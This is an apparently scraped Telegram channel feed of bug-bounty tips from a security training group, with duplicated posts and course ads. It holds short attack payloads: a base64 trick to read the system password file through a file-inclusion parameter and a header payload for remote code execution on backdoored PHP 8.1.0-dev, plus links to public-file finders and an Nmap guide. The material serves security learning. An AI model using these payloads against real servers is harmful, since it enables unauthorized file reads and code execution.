url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...
By:@GodfatherOrwa
#bugbountytips #BugBounty
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...
By:@GodfatherOrwa
#bugbountytips #BugBounty
👍10🔥2🤔2❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4
Please open Telegram to view this post
VIEW IN TELEGRAM
WhatsApp.com
Brut Security Academy
Business Account
Find public files in Amazon S3
http://s3digger.com
Find public files in Dropbox
https://drodigger.com
Find public files in Disk Yandex
https://yadigger.com
Find public files in Google Drive
https://drodigger.com
Find public files in other file sharing sites
https://fidigger.com
Find public files on url shortening sites
https://shortdigger.com
http://s3digger.com
Find public files in Dropbox
https://drodigger.com
Find public files in Disk Yandex
https://yadigger.com
Find public files in Google Drive
https://drodigger.com
Find public files in other file sharing sites
https://fidigger.com
Find public files on url shortening sites
https://shortdigger.com
👍4❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍4
Brut Security
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
👍4
Brut Security pinned «💥 2 Days Left for Registration of July Batch: Extreme Web Application Penetration Testing 💥 🚨 Classes Starting From- Tuesday 16 July, 4PM INDIAN STANDARD TIME 💯 Registration Link- https://wa.me/message/NQLPOBIAEFDBN1 ⭕️ Join us for an intensive 2-month course…»
👁 Nmap Cheat Sheet 2024: All the Commands & Flags.
https://www.stationx.net/nmap-cheat-sheet/
• Host Discovery;
• Output Format Scan;
• Understanding Nmap Packet Trace;
• Nmap Scan with Timing Parameters;
• Nmap Scans using Hex Value of Flags;
• Forensic Investigation of Nmap Scan using Wireshark;
• Understanding Guide for Nmap Timing Scan (Firewall Bypass);
• Understanding Guide for Nmap Ping Scan (Firewall Bypass);
• Comprehensive Guide on Nmap Port Status;
• How to Detect NMAP Scan Using Snort;
• Understanding Guide to Nmap Firewall Scan (Part 2);
• Understanding Guide to Nmap Firewall Scan (Part 1);
• Understanding Nmap Scan with Wireshark;
• Password Cracking using Nmap;
• Vulnerability Scan;
• Network Scanning using NMAP (Beginner Guide);
• MSSQL Penetration Testing using Nmap;
• MySQL Penetration Testing with Nmap.
https://www.stationx.net/nmap-cheat-sheet/
• Host Discovery;
• Output Format Scan;
• Understanding Nmap Packet Trace;
• Nmap Scan with Timing Parameters;
• Nmap Scans using Hex Value of Flags;
• Forensic Investigation of Nmap Scan using Wireshark;
• Understanding Guide for Nmap Timing Scan (Firewall Bypass);
• Understanding Guide for Nmap Ping Scan (Firewall Bypass);
• Comprehensive Guide on Nmap Port Status;
• How to Detect NMAP Scan Using Snort;
• Understanding Guide to Nmap Firewall Scan (Part 2);
• Understanding Guide to Nmap Firewall Scan (Part 1);
• Understanding Nmap Scan with Wireshark;
• Password Cracking using Nmap;
• Vulnerability Scan;
• Network Scanning using NMAP (Beginner Guide);
• MSSQL Penetration Testing using Nmap;
• MySQL Penetration Testing with Nmap.
StationX
Nmap Cheat Sheet 2026: All the Commands & Flags
Discover the most useful nmap scanning, enumeration, and evasion commands with our comprehensive Nmap cheat sheet and take your hacking to the next level.
👍2🔥2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Money comes, money goes. Focus on learning.
In the world of bug bounty hunting, it's easy to get caught up in the pursuit of monetary rewards. However, remember that money comes and goes. The real value lies in the skills and knowledge you gain along the way. Every vulnerability you uncover, every system you test, and every report you write contributes to your growth as a cybersecurity expert. Prioritize learning and honing your craft, and the financial rewards will naturally follow. Stay curious, stay dedicated, and let your passion for learning be your true guide.
Thanks,
The Brut Security Team
In the world of bug bounty hunting, it's easy to get caught up in the pursuit of monetary rewards. However, remember that money comes and goes. The real value lies in the skills and knowledge you gain along the way. Every vulnerability you uncover, every system you test, and every report you write contributes to your growth as a cybersecurity expert. Prioritize learning and honing your craft, and the financial rewards will naturally follow. Stay curious, stay dedicated, and let your passion for learning be your true guide.
Thanks,
The Brut Security Team
👍12💯2❤1
Complete Guide on Attack Surface Discovery 🔍
Check out our latest article detailing the steps a cybersecurity researcher can follow to construct an Attack Surface using Netlas.io and other tools. Don't miss it! 🔥
👉🏻 Read now: https://netlas.io/blog/attack_surface_discovery_guide/
❗️Netlas' blog is now available at netlas.io/blog❗️
Check out our latest article detailing the steps a cybersecurity researcher can follow to construct an Attack Surface using Netlas.io and other tools. Don't miss it! 🔥
👉🏻 Read now: https://netlas.io/blog/attack_surface_discovery_guide/
❗️Netlas' blog is now available at netlas.io/blog❗️
netlas.io
Complete Guide on Attack Surface Discovery - Netlas Blog
A comprehensive approach to mapping your attack surface, helping you identify vulnerabilities, assess risks, and implement effective security measures.
👍3
(^|^[^:]+:\/\/|[^\.]+\.)example.*
(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.
([^\.]+\.): Matches the subdomain (if any) before the main domain example.
example: The main domain name, replaced with example in this example.
.*: Matches any characters (including none) after the main domain name.
Protocols like http:// or https://
Subdomains like sub.example or foo.bar.example
Paths and query strings like /path/to/resource?param=value
1.Burp JS Link Finder: Finds JavaScript files and links on the target website.
2.Paraminer: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.
3.Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.
4.Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.
5.SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👏2
Find a server running PHP 8.1.0-dev ❓
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty
👍8🥰2